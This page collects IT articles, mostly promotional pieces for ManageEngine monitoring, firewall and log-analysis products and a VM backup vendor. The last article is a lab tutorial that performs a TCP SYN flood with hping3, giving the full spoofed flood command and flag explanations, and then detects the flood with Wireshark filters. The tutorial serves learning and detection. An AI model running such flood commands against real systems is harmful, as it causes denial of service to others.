Look online to see if there are any reviews on the solution you are looking at purchasing.

A quick google search should be all you need to see if there are any major issues with the software.

Service Level Agreements

When you receive your terms, review the support clauses to see if the SLAs are in line with your expectations. Ideally, you want the vendor to respond fairly quickly to your support requests especially if they are related to a restore.

Support Availability

For availability, the two main areas for consideration are:

  • Can you phone or email the support team?

Being able to call the support team is important because other methods such as email and chat are slow and might be triaged for several hours or misclassified into another severity level. Phone support is incredibly important when looking at your options.

  • Support hours

It always feels as though we need support at the worst possible time. Trying to get an application or Virtual Machine restore completed through the evening so that it is ready for the morning can be a challenge. With this in mind, we should try to choose a VM backup vendor that has a 24/7 helpdesk who you can call at any time and log a case.


One of the great things about Altaro is their support. They commit to responding to support calls in under 30 seconds. Guaranteed!

altaro customer support

Summary

This article helped identify the main considerations for your VM Backup solution to ensure business continiouity, data integrity, data availability and more. We talked about the importance of the number of VMs and Hosts supported by the VM backup, type of backup storage supported, advanced  storage space conservation techniques such as Augmented Inline Deduplication, WAN Optimization backup techniques to maximise your backups over WAN links, Guest Quiescing for database backups, Instant restore capabilities for fast restoration, VM Billing and Pricing models, VM Backup Security and encryption and vendor support.

We believe that Altaro fits the needs of most organisations due to their scalable, feature-rich solution. With an average call pickup of only 22 seconds, straight to a product expert with no gatekeepers in the way of your support experience is enough on its own for most to look at Altaro as a viable solution.

  • Hits: 9386
AIOPS for IT Operations

Artificial Intelligence For IT Operations (AIOps) - Why You Should Care (or not)

aiops for it operations introIn the rapidly evolving landscape of IT operations, organizations are increasingly turning to Artificial Intelligence for IT Operations (AIOps) to streamline their processes, enhance efficiency, and overcome the challenges of managing complex and dynamic IT environments.

AIOps combines artificial intelligence, machine learning, and big data analytics to deliver powerful insights and automation capabilities that drive transformative benefits. In this article we'll explore the significance of AIOps in the modern IT era.

Key Topics:

Download your free complete guide to Artificial Intelligence for IT Operations.

aiops abstract architectureAIOps abstract architecture (Free ManageEngine Whitepaper) - click to enlarge

Proactive Problem Resolution

AIOps enables organizations to move away from reactive approaches to IT management. By leveraging machine learning algorithms and advanced analytics, AIOps can identify patterns, anomalies, and potential issues in real-time. This proactive approach empowers IT teams to address problems before they impact end-users, improving system availability, and reducing mean-time-to-resolution.

aiops event noise filteringEvent noise filtering with the help of AIOps (Free ManageEngine Whitepaper)

Continue reading

  • Hits: 6295

Network Management Systems Help Businesses Accurately Monitor Important Application Performance, Infrastructure Metrics, Bandwidth, SLA Breaches, Delay, Jitter and more

Accurately monitoring your organization’s business application performance, service provider SLA breaches, network infrastructure traffic, bandwidth availability, Wi-Fi capacity, packet loss, delay, jitter and other important metrics throughout the network is a big challenge for IT Departments and IT Managers. Generating meaningful reports for management with the ability to focus on specific metrics or details can make it an impossible task without the right Network Management System.

The continuous demand for businesses network infrastructure to support, uninterrupted, more applications, protocols and services has placed IT departments, IT Managers and, subsequently, the infrastructure they manage, under tremendous pressure. Knowing when the infrastructure is reaching its capacity and planning ahead for necessary upgrades is a safe strategy most IT Departments try to follow.

The statistics provided by the Cisco Visual Networking (CVN) Index Forecast predict an exponential growth in bandwidth requirements the coming 5 years:

cisco visual networking index forecast

These types of reports, along with the exponential growth of bandwidth & speed requirements for companies of all sizes, raises a few important questions for IT Managers, Network Administrators and Engineers:

  • Is your network ready to accommodate near-future demanding bandwidth requirements?
  • Is your current LAN infrastructure, WAN and Internet bandwidth sufficient to efficiently deliver business-critical applications, services and new technologies such as IoT, Wi-Fi - 802.11n and HD Video?
  • Do you really receive the bandwidth and SLA that you have signed for with your internet service provider or are the links underutilized and you are paying for expensive bandwidth that you don’t need?
  • Do you have the tools to monitor network conditions prior to potential issues becoming serious problems that impact your business?

All these questions and many more are discussed in this article aiming to help businesses and IT staff understand the requirements and impact of these technologies on the organization’s network and security infrastructure.

We show solutions that can be used to help obtain important metrics, monitor and uncover bottlenecks, SLA breaches, security events and other critical information.

Key Topics:

Finally, we must point out that basic knowledge of the Networking and Design concepts is recommended for this article.

Click to Discover how a Network Management System can help Monitor your Network, SLAs, Delay Jitter and more.

Network Performance Metrics and their Bandwidth Impact

Network performance metrics vary from business to business and provide the mechanism by which an organization measures critical success factors.

The most important performance metrics for business networks are as follows:

  • Connectivity (one-way)
  • Delay (both round-trip and one-way)
  • Packet loss (one-way)
  • Jitter (one-way) or delay variation
  • Service response time
  • Measurable SLA metrics

Bandwidth is one of the most critical variables of an IT infrastructure that can have a major impact to all the aforementioned performance metrics. Bandwidth over saturated links can cause poor network performance with high packet loss, excessive delay, and jitter which can result in lost productivity and revenue, and increased operational costs.

New Applications and Bandwidth Requirements

This rapid growth for bandwidth affects the Enterprises and Service Providers which are continually challenged to efficiently deliver business-critical applications and services while running a network at optimum performance. The necessity for more expensive bandwidth solutions is one of the crucial factors that may have a major impact on a network and applications performance. Let’s have a quick look at the new technologies with high bandwidth needs which require careful bandwidth and infrastructure planning:

High Definition (HD) Video Bandwidth Requirements

This surpassed standard definition by the end of 2011. User demand for HD video has a major impact on a network due to the demanding bandwidth requirements as clearly displayed below:

dvd 720 1080p bandwidth requirements

DVD, 720p HD and 1080p HD bandwidth requirements:

  • (H.264) 720p HD video requires around 2,5 Mbps or twice as much bandwidth as (H.263) DVD
  • (H.264) 1080p HD video requires around 5Mbps or twice as much bandwidth as (H.264) 720p
  • Ultra HD 4320p video requires around 20Mbps or four times as much bandwidth as (H.264) 1080p

BYOD and 802.11ac Bandwidth Requirements

802.11ac is the next generation of Wi-Fi. It is designed to give enterprises the tools to meet the demands of BYOD access, high bandwidth applications, and the always-on connected user. The 802.11ac IEEE standard allows for theoretical speeds up to 6.9 Gbps in the 5-GHz band, or 11.5 times those of 802.11n!

Taking into consideration the growing trend and adoption of Bring-Your-Own-Device (BYOD) access, it won’t be long until multi-gigabit Wi-Fi speeds will become necessary.

Virtual Desktop Infrastructure (VDI) Bandwidth Requirements

Each desktop delivered over WAN can consume up to 1 Mbps bandwidth and considerably more when employees access streaming video. In companies with many virtual desktops, traffic can quickly exceed existing WAN capacity, noticeably degrading the user experience.

Cloud IP Traffic Statistics

The Annual global cloud IP traffic will reach 14.1 ZB (1.2 ZettaBytes per month) by the end of 2020, up from 3.9 ZB per year (321 ExaBytes per month) in 2015.
Annual global data center IP traffic will reach 15.3 ZB (1.3 ZB per month) by the end of 2020, up from 4.7 ZB per year (390 EB per month) in 2015. These forecasts are provided by the Cisco Global Cloud Index (GCI) which is an ongoing effort to forecast the growth of global data center and cloud-based IP traffic.

Application Bandwidth Requirements and Traffic Patterns

Bandwidth requirements and traffic pattern are not common among various applications and need careful planning as displayed below:

 Data, Video, Voice and VDI bandwidth requirements & traffic patterns

Data, Video, Voice and VDI bandwidth requirements & traffic patterns

An effective strategy is essential in order to monitor network conditions prior to potential issues becoming serious problems. Poor network performance can result in lost productivity, revenue, and increased operational costs. Hence, detailed monitoring and tracking of a network, applications, and users are essential in optimizing network performance.

Network Monitoring Systems (NMS) for Bandwidth Monitoring

An NMS solution needs to keep track of what is going on in terms of link bandwidth utilization and whether it is within the normal (baseline) limits. In addition, network and device monitoring helps network operators optimize device security either proactively or in a fast, reactive approach. Standard monitoring protocols such as Simple Network Management Protocol (SNMP) and NetFlow make the raw data needed to diagnose problems readily available. Finally, historical network statistics is an important input to the calculations when planning for a bandwidth upgrade.

SNMP can easily provide essential network device information, including bandwidth utilization. In particular, the NMS can monitor bandwidth performance metrics such as backplane utilization, buffer hits/misses, dropped packets, CRC errors, interface collisions, interface input/output bits, & much more periodically via SNMP.

Network devices can be monitored via SNMP v1, 2c, or 3 and deliver bandwidth utilization for both inbound and outbound traffic. XML-API can be used to monitor and collect bandwidth statistics information from supported devices such as the CISCO UCS Manager. In addition, Network maps with bandwidth utilization graphs can visualize the flow of bandwidth and spot bottlenecks at a glance.

Bandwidth issues reported by users regarding delays and slow response to applications cannot be identified with only SNMP based information. It needs technologies such as Cisco NBAR, Netflow, Juniper J-Flow, IPFIX, sFlow, Huawei NetStream or CBQOS to understand the bandwidth utilization across applications, users and devices. With these technologies, monitoring is possible to perform in-depth traffic analysis and determine in detail the who, what, when and where of bandwidth usage.

Finally, performance thresholds and reporting topN devices with specific characteristics (TopN reporting) are useful, both for noticing when capacity is running out, and for easily correlating service slowness with stressed network or server resources. Those metrics can be the first indication of an outage, or of potential SLA deterioration to the point where it affects delivery of services.

ManageEngine OpManager12 NMS Features

OpManager is the NMS product offered by Manage Engine. OpManager can be easily installed and deployed, and provide all the visibility and control that you need over your network.

In brief, it offers the following main features:

  • Physical and virtual server monitoring
  • Flow-based bandwidth analysis
  • Firewall log analysis and archiving
  • Configuration and change management
  • IP address and switch port management

The tools mentioned below are needed for insight visibility of the bandwidth network performance. They can assist you to prepare your network for the deployment of new technologies and to measure the network performance indexes that we discussed in the previous sections. In particular, it offers the following tools to achieve complete network bandwidth visibility:

Bandwidth Monitoring: Tracks network bandwidth usage in real-time and provides info for the topN users consuming bandwidth on a network.

Router Traffic Monitoring: Continuously monitors networking devices using flows and generates critical information to ensure proper network bandwidth usage.

Cisco AVC Monitoring: in-depth visibility on the bandwidth consumption per application. Ensure business critical applications get maximum priority. Forecast future bandwidth needs and prepare your network before deploying new services and technologies.

Advanced Security Analytics Module: Detect threats and attacks using continuous Stream Mining Engine technology. This ensures high network security and a method to detect and eliminate network intruders.

Cisco IPSLA Monitoring: Monitor critical metrics affecting VoIP, HD Video performance, VDI and ensure best-in-class service levels. Ensure seamless WAN connectivity through WAN RTT monitoring.

Cisco NBAR Reporting: Recognize a wide variety of applications that use dynamic ports. Classify and take appropriate actions on business critical and non-critical applications.

ManageEngine OpManager-12 Trial Version Installation

The installation of OpManger12 trial version is discussed in this section. The installation is very simple and fast. We didn’t take more than 5 minutes to install it.

Two options are provided during the installation:

  • 30 days trial without any limitation to the number of the devices and interfaces
  • Free edition where you can monitor up to 10 devices

We installed the 30-day trial version. You can easily uninstall the trial version in less than 2 minutes after the product evaluation, by following the OpManager uninstall wizard. Let’s rock!

We start by downloading the Windows or Linux installation file of OpManager from the following link:

opmanager download

Downloading OpManager for Windows or Linux systems (Click to download)

Once downloaded run the file to initiate the Install Wizard which guides us through the installation process.

After accepting the license agreement it is necessary to select the installation mode to test the ManageEngine OpManager 12. We selected the 30 days trial version, which is more than enough for evaluation:

 opmanager installation trial free edition

Selecting between OpManager 30 Day Trial or Free Edition

Next, we select the language and path for the installation followed by the recommended ports required for OpManager. In particular, port 80 is the default server port of OpManager and port 9996 is the default port to listen for netflow packets. The ports can be easily changed during the installation.

 opmanager webserver and netflow ports

Selecting and changing OpManager WebServer and NetFlow ports

Next, we skip the Registration for Technical Support since we don’t require it for the evaluation of the product. OpManager will now commence its installation process.

When the file copy process is complete, we are prompted to select whether we are installing a Primary or Standby server. Redundancy is not required for our product evaluation:

 Selecting between Primary and Standby OpManager Installation

Selecting between Primary and Standby OpManager Installation

The next option allows the installation of OpManager using MSSQL or POSTGRESQL which is the fastest installation option. POSTGRESQL is bundled with the product and is a great option for evaluation cases:

 Selecting between OpManager with PostgreSQL or MSSQL

Selecting between OpManager with PostgreSQL or MSSQL

We managed to complete the installation process in less than 3 minutes!

As soon as we hit the Finish button, the initialization of the modules starts. Meanwhile we can take a quick look at the Readme file which includes useful information about the product.

OpManager launches in less than a minute after completing its initialization. The welcome tour introduces us to the main functionalities of the product:

 OpManager’s welcome tour

OpManager’s welcome tour

We are ready now to start working and discover this product. You can start by discovering your network devices. It is a powerful tool with plenty of capabilities.

 OpManager Network Device Discovery

OpManager Network Device Discovery

Selecting the overview tab from the left column we see (screenshot below) useful information about Network, Server, Virualization, Netflow, Network Configuration Management (NCM), Firewall and IP address Management (IPAM). All the essential components that should be monitored in a network:

NOTE: The single discovered device shown is by default the Server where OpManager is installed.

 OpManager discovered devices and network view

OpManager discovered devices and network view

All installed features and application add-ons enabled for the 30 day evaluation period are shown:

OpManager installed options and product details
OpManager installed options and product details

Summary

Bandwidth availability is a critical factor that has a major impact on a network and also affects application performance. The introduction of new IT technologies & policies, such as BYOD and HD-Video etc, requires careful planning, provisioning and monitoring by a sophisticated reputable NMS. The NMS should not only monitor bandwidth utilization but also perform in-depth traffic analysis and determine in detail the who, what, when and where of bandwidth usage. OpManger12 is the NMS solution that includes all the tools for bandwidth and application monitoring by utilizing NBAR, Netflow, SNMP and XML-API technologies, helping IT Departments and IT Managers get centralized visibility of their network that was previously impossible.

  • Hits: 17006

Ensuring Enterprise Network Readiness for Mobile Users – Wi-Fi, Bandwidth Monitoring, Shadow IT, Security, Alerts

enterprise-network-monitoring-management-wifi-security-mobility-1aDemands for Enterprise networks to properly support mobile users is on a continuous rise making it more than ever necessary for IT departments to provide high-quality services to its users. This article covers 4 key-areas affecting mobile users and Enterprise networks: Wi-Fi coverage (signal strength – signal-to-noise ratio), Bandwidth Monitoring (Wi-Fi Links, Network Backbone, routers, congestion), Shadow IT (Usage of unauthorized apps) and security breaches.

Today, users are no more tied to their desktops/laptops. Now, they are mobile. They can reply to important business emails, access their CRM, collaborate with peers, share files with each other & much more from cafeteria or car parking. This implies that it's high time for network admins at enterprises to think or give equal importance to wireless networks similar to wired networks. Wireless networks should be equally faster and secure.

Though the use of mobile devices for business actives is a good thing to happen for both enterprises and its customers, it also has some drawbacks on the network management side. The top 4 things to consider to make your network mobile ready are:

  • Wi-Fi signal strength
  • Bandwidth congestion
  • Shadow IT
  • Security breaches and attacks

enterprise-network-monitoring-management-wifi-security-mobility-1Figure 1. OpManager Network Management and Monitoring - Click for Free Download

Wi-Fi Signal Strength

A good Wi-Fi signal is a must throughout the campus. Employees must not feel any connectivity problem or slowness because of poor signal quality. The signal should be so good and similar to the ones provided by the carriers. However, it’s not quite easy to maintain good signal strength all throughout the building. Apart from Wireless LAN Controller (WLC) and Wireless Access Point (WAP), channel interference also plays a major role in ensuring a good Wi-Fi signal strength.

RF interference is the noise or interference caused by other wireless & Bluetooth devices such as phones, mouse, remote controls, etc. that disrupts the Wi-Fi signal. Since all these devices operate on the same 2.4GHz to 5 GHz frequencies, it disrupts the Wi-Fi signal strength. When a client device receives another Wi-Fi signal it will defer transmission until the signal ceases. Interference that occurs during transmission also causes packet loss. As an effect Wi-Fi retransmissions take place which in fact slow down throughput and result in wildly fluctuating performance for all users sharing a given access point (AP).

Download your free copy of OpManager - Manage and Monitor your network

A common metric for measuring the Wi-Fi signal strength is the Signal-to-Noise (SNR) Ratio. SNR is the ratio of signal power to the noise power and expressed in decibels. SNR of 41db is considered excellent and 10-15db is considered as poor. However, as soon as interference is experienced SINR is the metric to look for. SINR is the Signal-to-Interference plus Noise Ratio which provides the difference between the signal level and the level of interference. Since RF interference creates disrupts the user throughput, SINR provides the real performance level of the Wi-Fi systems. A higher SINR is considered good as it indicates higher data rates.

enterprise-network-monitoring-management-wifi-security-mobility-2Figure 2. OpManager: Network Analysis – Alarms, Warnings and Statistics - Click for Free Download

Shadow IT

Employees making use of third-party apps or services without the knowledge of IT, to get their job done is known as Shadow IT. Though it makes employees to choose the apps or services that works form them and be productive, it also leads to some conflicts and security issues. Using apps that are not verified by the IT team may cause serious security breaches and may even lead to loss of corporate data.

It's tough to restrict shadow IT because employees keep finding ways to find apps and services that they feel comfortable or easy-to-work with. And satisfied users use word-of-mouth marketing and increase the adoption of such apps/services among their peers. Sometimes, this creates conflict with existing IT policy and slows down the operations itself. However, the adoption of Shadow IT is on the rise. According to a study, shadow IT exists in more than 75% of the enterprises and expected to grow more.

Security Breach & Attacks

Public Wi-Fi hotspots are favorites for hackers. They try to steal data from the mobile devices that connect to the hotpots. Few years back The Guardian, a UK based journal deployed a mock Wi-Fi hotspot at an airport to demonstrate how critical information such as email ID, passwords, credit card data, etc. can be hacked via the Wi-Fi connection. Many travelers connected to hotspot and entered their details, which fraudsters could have misused in case of a real hack.

enterprise-network-monitoring-management-wifi-security-mobility-3Figure 3. OpManager: Network Bandwidth, QoS and Policy Utilization - Click for Free Download

It's highly impossible for employees or as a matter of fact for anyone to refrain themselves from connecting to public Wi-Fi when they travelling or in public places. However, hackers use public Wi-Fi to inject malicious code that acts as Trojans, which in turn helps them steal corporate data.

Bandwidth Congestion

Admins have no control when it comes to employees accessing their mobile devices for their personal use also, which includes accessing sites such as Facebook, WhatsApp, YouTube, Twitter, etc. They cannot totally restrict them as the world is becoming more social, at least online, and have to allow them to use such apps. However, it should not take a toll on the employees accessing business critical apps.

Buying additional bandwidth is the usual approach followed to solve the bandwidth crisis. However, that’s not an effective way to manage bandwidth in enterprise networks. Most enterprises spend heavily on bandwidth. According to a survey done by us with the Cisco Live US, 2015 attendees, 52% of them spend more than $25,000 per month for bandwidth.

Effective Wireless Network Management Is The Need Of The Hour

Wireless LAN Controllers (WLC) and Wireless Access Points (WAP) form the backbone of wireless network. It's very imperative to monitor them proactively so that any performance issues can be resolved before it turns big and impacts the users. Critical metrics such as SNR and SINR has also to be monitored in real-time so that any degradation in signal strength can be quickly identified and fixed. Heat-maps play a critical role in visually representing the signal strength across the floor. Make use of such heat maps and display it on the NOC screens so that any signal problem can be found out in real-time.

Having strict firewall and security policies combined with effective firewall management prevents enterprises from attacks and hacks caused due to hackers and shadow IT. For solving bandwidth related issues, network admins can make use of traffic shaping techniques to prioritize bandwidth for business critical apps. This avoids buying additional bandwidth often and helps providing adequate bandwidth for business critical apps and minimum bandwidth for non-business critical apps. 

Doing all these manually would be highly cumbersome. Look out for tools or solutions that offer proactive monitoring of wireless networks, provide heat maps to identify and measure Wi-Fi signal strength, manage firewall configurations and policies, and troubleshoot bandwidth related issues. With such a solution and strict security policies in place, you can make your network ready for mobile devices.

ManageEngine OpManager is one such network management software that offers increased visibility and great control over your network. It out-of-the-box offers network monitoring, physical and virtual server monitoring, flow-based bandwidth analysis, firewall log analysis and archiving, configuration and change management, and IP address and switch port management, in one single exe. You can monitor WiFi signal strength

  • Hits: 11856
Managing Complex Firewall Security Policies

Challenges & Solutions to Managing Firewall Rules in Complex Network Environments

firewall security rules policy managementIn today's interconnected digital landscape, where businesses rely heavily on networked systems and the internet for their operations, the importance of cybersecurity cannot be overstated. Among the essential tools in a cybersecurity arsenal, firewalls stand as a frontline defense against cyber threats and malicious actors.

One of the primary functions of a firewall is to filter traffic, which entails scrutinizing packets of data to determine whether they meet the criteria set by the organization's security policies. This process involves examining various attributes of the data packets, such as source and destination IP addresses, port numbers, and protocols. By enforcing these rules, firewalls can thwart a wide range of cyber threats, including unauthorized access attempts, malware infections, denial-of-service attacks and more.

Enforcing and managing firewall rules effectively can be a daunting task, particularly in complex network environments with numerous rules, policies and configurations. While solutions like ManageEngine Firewall Analyzer step in, to offer a comprehensive way to streamline firewall rule management and enhance security posture, it’s worthwhile take a look at the real challenges firewall rule management present across all known platforms such as Cisco (FTD, Firepower, ASA), Palo AltoPalo Alto Next-Gen firewalls, Checkpoint, Fortinet, Juniper and more.

Key Topics:

Challenges with Firewall Rule Management

Continue reading

  • Hits: 1524
Dealing with Security Audit Challenges

Dealing with Security Audit Challenges: Discovering vulnerabilities, unauthorized access, optimize network security & reporting

manageengine firewall analyzer - dealing with security audit challengesThe utilization of log analyzers, such as Firewall Analyzer, in network infrastructure plays a pivotal role in enhancing cybersecurity and fortifying the overall security posture of an organization. Security audits, facilitated by log analyzers, serve as a critical mechanism for systematically reviewing and analyzing recorded events within the network.

This proactive approach enables the identification of potential security risks, unauthorized access attempts, and abnormal activities that might signify a breach. The log analyzer sifts through vast amounts of data & logs, providing insights into patterns and anomalies that might go unnoticed otherwise.

By uncovering vulnerabilities and irregularities, organizations can take timely corrective actions, preventing potential security breaches. Moreover, the information gleaned from these audits is instrumental in formulating a comprehensive security strategy that extends across the entire network infrastructure.

ManageEngine Firewall Analyzer dashboard
ManageEngine Firewall Analyzer dashboard (click to enlarge)

This strategic approach ensures a holistic defense against cyber threats, fostering a resilient and adaptive cybersecurity framework that aligns with the evolving landscape of security challenges.

This article will delve into the concept of security audits and how a product like Firewall Analyzer can streamline this crucial procedure.

Key Topics:

Download your copy of ManageEngine's popular Firewall Analyzer here.

Security Audits Explained

Continue reading

  • Hits: 1926
Compliance in a Hybrid Work Environment

Ensuring Compliance and Business Continuity in a Hybrid Work Environment

compliance in a hybrid environmentIn the wake of digital transformation, the work landscape as we know it has undergone a dynamic shift. People can now work from home, from the office, or anywhere with a stable internet connection. Labeled as hybrid work, organizations have gradually started to adopt this seamless blend between remote work and on-site engagement.

According to the digital readiness survey by ManageEngine, remote work will have a lasting impact with 96% of organizations stating that they will be supporting remote workers for at the least the next two years. While the remote working model offers significant advantages to employees, such as a better work-life balance, it presents significant challenges for organizations in extending office-like network security.

To ensure the success of hybrid work, every organization should address challenges related to security, compliance, and data protection. This article delves into the risks and issues associated with ensuring compliance in a hybrid work environment. Let's dive in.

Key Topics:

Network Compliance in a Hybrid Work Environment

Compliance refers to the adherence of an organization's infrastructure, configuration, and policies to industry standards. In a hybrid work environment where employees are working away from the office, it becomes difficult to ensure compliance. To overcome this, companies are employing a deluge of smart monitoring systems to make sure they stay compliant with industry norms.

Besides legal obligation, compliance also helps in safeguarding networks from security incidents such as breach attempts, overlooked vulnerabilities, and other operational inefficiencies.

Consequences of Compliance Violations

Non-compliance, which refers to the failure to adhere to laws, regulations, or established guidelines, can have a wide range of repercussions that vary depending on several factors. The severity of these consequences is often determined by the nature and extent of the violation, the specific mandate or regulation that has been breached, and the subsequent impact on various stakeholders involved. Here, we delve into the potential consequences of non-compliance in more detail:

Continue reading

  • Hits: 2509
Firewall Analyzer Management Tool

Discover the Ultimate Firewall Management Tool: 7 Essential Features for Unleashing Unrivaled Network Security!

The Ultimate Firewall Management ToolFirewall security management is a combination of monitoring, configuring, and managing your firewall to make sure it runs at its best to effectively ward off network security threats. In this article, we will explore the seven must-have features of a firewall security management tool and introduce Firewall Analyzer, a popular Firewall Management Tool that has set the golden standard in Firewall Management across all vendors of firewall and security products.  Furthermore, we'll explain how central firewall policy management, VPN management, log analysis, log retention, compliance management and threat identification/forensics, help create a robust cybersecurity and network security posture that increases your organization's ability to protect its networks, information, and systems from threats.

The seven must-have features of a firewall security management tool are:

  1. Firewall Policy Management
  2. VPN Management
  3. Firewall Change Management
  4. Compliance Management
  5. Log Analysis & Threat Identification
  6. Log Retention & Forensics
  7. Network Security Alerts

Let’s take a look at each of these features and provide examples that showcase their importance.

Firewall Policy Management

Firewall Policy ManagementThis is the process of managing and organizing your firewall rules. These firewall rules and policies dictate the traffic that is entering and exiting your network, and can also be used to block illegitimate traffic.

Why is this important? Effective firewall policy management can be used to ensure firewall policies never become outdated, redundant, or misconfigured, leaving the network open to attacks.  

One of the primary challenges in firewall policy management is the potential for human error. Configuring firewall rules and policies requires a deep understanding of network architecture, application requirements, and security best practices. Unfortunately, even experienced IT professionals can make mistakes due to various factors, such as time constraints, lack of communication, or a misunderstanding of the network's specific needs.

Different individuals within an organization may also have different levels of expertise and understanding when it comes to firewall policies. This diversity in knowledge and experience can lead to inconsistencies, redundant rules, or conflicting configurations, compromising the firewall's overall effectiveness.

Taking proactive steps to manage firewall policies effectively can significantly enhance an organization's security posture and protect valuable assets from potential breaches and cyberattacks. This is where solutions such as Firewall Analyzer can undertake the burden of managing firewall policies through an intuitive, simplified and easy-to-follow interface no matter the vendor of firewall you’re dealing with.

Few of the key-features offered by Firewall Analyzer include:

  • Gain enhanced visibility on all the rules in your firewall and a comprehensive understanding of your security posture.
  • Quickly identify and record anomalies in redundant, generalized, correlated, shadowed, or grouped rules.
  • Analyze firewall policies and get suggestions on changes to rule order to optimize performance.
  • Simplify the rule creation, modification, and deletion process.
  • Check the impact of a new rule on the existing rule set.

Continue reading

  • Hits: 3160
Windows Server Threat Detection

Detecting Windows Server Security Threats with Advanced Event Log Analyzers

Windows Server Threat DetectionWindows Servers stand as prime targets for hackers and malicious actors due to their widespread usage and historical vulnerabilities. These systems often serve as the backbone for critical business operations, housing sensitive data and facilitating essential services. However, their prevalence also makes them vulnerable to cyber threats, including ransomware attacks, distributed denial-of-service (DDoS) assaults and more.

Windows Servers have a documented history of vulnerabilities and exploits, which further intensifies their attractiveness to attackers seeking to exploit weaknesses for unauthorized access or data theft. Consequently, it is paramount for organizations to prioritize mitigating these risks and safeguarding the integrity and continuity of operations within Windows Server environments.

Fortunately, tools like EventLog Analyzer offer robust capabilities for automatically identifying and countering such threats, uplifting the security posture of Windows Server setups. To effectively leverage these defenses, it's imperative to understand the nature of common Windows server threats and how they manifest. In this document, we delve into several prevalent threats targeting Windows servers and outline strategies for their detection and mitigation.

Furthermore, implementing robust security measures, such as regular patching, network segmentation, intrusion detection systems, and data encryption, Windows VM Backups, is essential to fortify Windows Servers against potential threats and ensure the resilience of critical business functions.

Key Topics:

Download now the world’s leading Event Log Management System.

Common Windows Server Threats

Windows Server, Ransomware, Threats, Phishing, DoS, Attacks, EventLog, Log, Detection

Continue reading

  • Hits: 685
Event Log Monitoring System

Event Log Monitoring System: Implementation, Challenges & Standards Compliance. Enhance Your Cybersecurity Posture

eventlog analyzerAn event log monitoring system, often referred to as an event log management, is a critical component to IT security & Management, that helps organizations strengthen their cybersecurity posture. It’s a sophisticated software solution designed to capture, analyze, and interpret a vast array of event logs generated by various components within an organization's IT infrastructure such as firewalls (Cisco ASA, Palo Alto etc), routers, switches, wireless controllers, Windows servers, Exchange server and more.

These event logs can include data on user activities, system events, network traffic, and security incidents and more. By centralizing and scrutinizing these logs in real-time, event log monitoring systems play a pivotal role in enhancing an organization's security posture, enabling proactive threat detection, and facilitating compliance with regulatory requirements.

Key Topics:

Event Log Categories

Event Log Monitoring Systems empowers organizations to identify and respond to potential security threats, operational issues, and compliance breaches promptly, making it an indispensable tool for maintaining the integrity and reliability of modern digital ecosystems.

All logs contain the following basic information:

Continue reading

  • Hits: 3285

How to Perform TCP SYN Flood DoS Attack & Detect it with Wireshark - Kali Linux hping3

wireshark logoThis article will help you understand TCP SYN Flood Attacks, show how to perform a SYN Flood Attack (DoS attack) using Kali Linux & hping3 and correctly identify one using the Wireshark protocol analyser. We’ve included all necessary screenshots and easy to follow instructions that will ensure an enjoyable learning experience for both beginners and advanced IT professionals.

DoS attacks are simple to carry out, can cause serious downtime, and aren’t always obvious. In a SYN flood attack, a malicious party exploits the TCP protocol 3-way handshake to quickly cause service and network disruptions, ultimately leading to an Denial of Service (DoS) Attack. These type of attacks can easily take admins by surprise and can become challenging to identify. Luckily tools like Wireshark makes it an easy process to capture and verify any suspicions of a DoS Attack.

Key Topics:

There’s plenty of interesting information to cover so let’s get right into it.

How TCP SYN Flood Attacks Work

When a client attempts to connect to a server using the TCP protocol e.g (HTTP or HTTPS), it is first required to perform a three-way handshake before any data is exchanged between the two. Since the three-way TCP handshake is always initiated by the client it sends a SYN packet to the server.

 tcp 3 way handshake

The server next replies acknowledging the request and at the same time sends its own SYN request – this is the SYN-ACK packet. The finally the client sends an ACK packet which confirms both two hosts agree to create a connection. The connection is therefore established and data can be transferred between them.

Read our TCP Overview article for more information on the 3-way handshake

In a SYN flood, the attacker sends a high volume of SYN packets to the server using spoofed IP addresses causing the server to send a reply (SYN-ACK) and leave its ports half-open, awaiting for a reply from a host that doesn’t exist:

Performing a TCP SYN flood attack

In a simpler, direct attack (without IP spoofing), the attacker will simply use firewall rules to discard SYN-ACK packets before they reach him. By flooding a target with SYN packets and not responding (ACK), an attacker can easily overwhelm the target’s resources. In this state, the target struggles to handle traffic which in turn will increase CPU usage and memory consumption ultimately leading to the exhaustion of its resources (CPU and RAM). At this point the server will no longer be able to serve legitimate client requests and ultimately lead to a Denial-of-Service.

How to Perform a TCP SYN Flood Attack with Kali Linux & hping3

However, to test if you can detect this type of a DoS attack, you must be able to perform one. The simplest way is via a Kali Linux and more specifically the hping3, a popular TCP penetration testing tool included in Kali Linux.

Alternatively Linux users can install hping3 in their existing Linux distribution using the command:

# sudo apt-get install hping3

In most cases, attackers will use hping or another tool to spoof IP random addresses, so that’s what we’re going to focus on.  The line below lets us start and direct the SYN flood attack to our target (192.168.1.159): 

# hping3 -c 15000 -d 120 -S -w 64 -p 80 --flood --rand-source 192.168.1.159

Let’s explain in detail the above command:

We’re sending 15000 packets (-c 15000) at a size of 120 bytes (-d 120) each. We’re specifying that the SYN Flag (-S) should be enabled, with a TCP window size of 64 (-w 64). To direct the attack to our victum’s HTTP web server we specify port 80 (-p 80) and use the --flood flag to send packets as fast as possible. As you’d expect, the --rand-source flag generates spoofed IP addresses to disguise the real source and avoid detection but at the same time stop the victim’s SYN-ACK reply packets from reaching the attacker.

How to Detect a SYN Flood Attack with Wireshark

Now the attack is in progress, we can attempt to detect it. Wireshark is a little more involved than other commercial-grade software. However, it has the advantage of being completely free, open-source, and available on many platforms.

In our lab environment, we used a Kali Linux laptop to target a Windows 10 desktop via a network switch. Though the structure is insecure compared to many enterprise networks, an attacker could likely perform similar attacks after some sniffing. Recalling the hping3 command, we also used random IP addresses, as that’s the method attackers with some degree of knowledge will use.

Even so, SYN flood attacks are quite easy to detect once you know what you’re looking for. As you’d expect, a big giveaway is the large amount of SYN packets being sent to our Windows 10 PC.

Straight away, though, admins should be able to note the start of the attack by a huge flood of TCP traffic. We can filter for SYN packets without an acknowledgment using the following filter:  tcp.flags.syn == 1 and tcp.flags.ack == 0

tcp syn flood attack detection with wireshark

As you can see, there’s a high volume of SYN packets with very little variance in time. Each SYN packet shows it’s from a different source IP address with a destination port 80 (HTTP), identical length of 120 and window size (64). When we filter with tcp.flags.syn == 1 and tcp.flags.ack == 1 we can see that the number of SYN/ACKs is comparatively very small. A sure sign of a TCP SYN attack.

tcp syn flood attack detection with wireshark

We can also view Wireshark’s graphs for a visual representation of the uptick in traffic. The I/O graph can be found via the Statistics>I/O Graph menu. It shows a massive spike in overall packets from near 0 to up to 2400 packets a second.

tcp syn flood attack wireshark graph

